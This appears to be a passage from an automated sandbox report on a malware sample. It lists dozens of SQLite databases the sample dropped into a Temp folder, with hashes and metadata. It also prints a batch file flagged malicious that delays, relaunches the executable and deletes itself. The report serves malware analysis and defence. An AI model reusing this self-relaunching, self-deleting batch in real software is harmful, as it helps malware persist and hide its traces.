                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VCJ0m1HVeq

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VDtfeHY1Kt

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VEe6RXqlRE

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VRCinNLpmy

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VSDlpsE1FV

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):221
                                                                    Entropy (8bit):5.18683981785612
                                                                    Encrypted:false
                                                                    SSDEEP:6:hCijTg3Nou1SV+DE1cSRr4bKOZG1cNwi23fvtn:HTg9uYDEf4iZHt
                                                                    MD5:0C7F3770BD7C56874674D930B80AADE9
                                                                    SHA1:8A31310AAEA85FB2F5EDEDF78F8A347CA2604068
                                                                    SHA-256:9B2D7BE9035ED4651F8064F4663C1E18A3815774F56665BF2B39C10962E59EC7
                                                                    SHA-512:98D6DDA9AD8FFB2817C3C3D492298869B0A52CA33B22C34CB6E24167099C4E243A7EC24C81D2229D5C6BE508930CDBFD35659797B234BB49B19046044D76FF5B
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\jW5TA1J9Z1.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\VTnJCG0P6y.bat"

                                                                    C:\Users\user\AppData\Local\Temp\VWVMtxUzgW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\VxsC6aU9GV

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WAdYZo8ris

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WDQkG4Tvb4

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WGlsFIZNGa

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WIfMSNffLb

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WRElZ1H7uf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WT6caEEUmG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WUpRHNttZo

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WmcKDS3KPE

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\X21CZkdykg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\X2JAAqreg9

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\X2k4ZtTApE

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\XJ6MBeaEBG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\XQSyxsceYk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\XQTPWiE55Z

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\XZXRKktRVB

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\XvclgzLzxz

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
